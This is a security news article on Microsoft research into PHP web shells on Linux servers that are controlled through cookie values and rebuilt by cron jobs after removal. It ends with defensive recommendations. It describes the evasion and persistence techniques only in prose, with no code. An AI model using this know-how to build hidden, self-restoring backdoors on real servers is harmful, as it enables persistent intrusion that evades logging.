Threat actors are increasingly using HTTP cookies as a control channel for PHP-based web shells on Linux servers and to achieve remote code execution, according to findings by the Microsoft Defender Security Research Team.
“Instead of exposing command execution via URL parameters or request bodies, these web shells rely on cookie values supplied by the threat actor to gate execution, pass instructions, and activate malicious functionality,” the tech giant said.
This approach provides additional privacy because it allows malicious code to remain dormant during normal application execution and activate web shell logic only when specific cookie values are present. Microsoft noted that this behavior extends to web requests, scheduled tasks, and trusted background workers.
The malicious activity takes advantage of the fact that cookie values are available at runtime via the $_COOKIE superglobal variable, allowing the attacker to consume the supplied input without additional parsing. Furthermore, this technology is unlikely to raise any red flags as cookies blend into normal web traffic and reduce visibility.
The cookie-controlled execution model comes in various implementations –
- A PHP loader that uses multiple layers of obfuscation and runtime checks before parsing structured cookie input to execute the encoded secondary payload.
- A PHP script that splits the structured cookie data to reconstruct operational components such as file handling and decoding functions, and conditionally writes a secondary payload to disk and executes it.
- A PHP script that uses a single cookie value as a marker to trigger threat actor-controlled actions, including execution of supplied input and file uploads.
In at least one case, threat actors have been found exploiting a known security vulnerability to gain initial access to a victim’s hosted Linux environment via legitimate credentials or to set up a cron job that periodically invokes a shell routine to execute an obfuscated PHP loader.
This “self-healing” architecture allows the PHP loader to be repeatedly rebuilt by a scheduled task, even if it is removed as part of cleanup and remediation efforts, creating a reliable and persistent remote code execution channel. Once the PHP loader is deployed, it remains dormant during normal traffic and springs into action when it receives HTTP requests with specific cookie values.
“By transferring execution control to cookies, the web shell can remain hidden from normal traffic, activating only during intentional interactions,” Microsoft said. “By separating persistence through cron-based re-builds from execution control via cookie-gated activation, the threat actor reduced operational noise and limited observable indicators in regular application logs.”
A common aspect that ties all the above implementations together is the use of obfuscation to hide sensitive functionality and cookie-based gating to initiate malicious actions while leaving a minimal interactive footprint.
To counter the threat, Microsoft recommends implementing multi-factor authentication for hosting control panels, SSH access, and administrative interfaces; Monitoring unusual login activity; restricting execution of shell interpreters; Auditing cron jobs and scheduled tasks on web servers; Checking suspicious file creation in web directories; And limiting the shell capabilities of the hosting control panel.
Microsoft said, “Continued use of cookies as a control mechanism suggests the reuse of established web shell tradeoffs.” “By moving control logic into cookies, threat actors enable persistent post-compromise access that can evade many traditional inspection and logging controls.”
“Instead of relying on complex exploit chains, the threat actor took advantage of legitimate execution paths already present in the environment, including web server processes, control panel components, and cron infrastructure, to stage and protect the malicious code.”
